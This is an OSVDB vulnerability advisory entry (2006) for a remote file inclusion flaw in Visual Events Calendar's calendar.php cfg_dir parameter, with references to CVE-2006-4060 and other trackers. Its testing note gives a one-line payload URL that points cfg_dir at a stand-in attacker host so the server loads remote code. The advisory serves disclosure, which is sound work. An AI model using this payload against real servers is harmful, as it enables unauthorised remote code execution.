Visual Events Calendar calendar.php cfg_dir Variable Remote File Inclusion

2006-08-07T10:05:09
ID OSVDB:27841
Type osvdb
Reporter OSVDB
Modified 2006-08-07T10:05:09

Description

Manual Testing Notes

http://[target]/[path]/calendar.php?cfg_dir=http://evil_scripts?

References:

Vendor URL: http://www.web-scripts.biz/calendar.php Security Tracker: 1016646 Secunia Advisory ID:21391 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0127.html Generic Exploit URL: http://www.milw0rm.com/exploits/2141 CVE-2006-4060 Bugtraq ID: 19395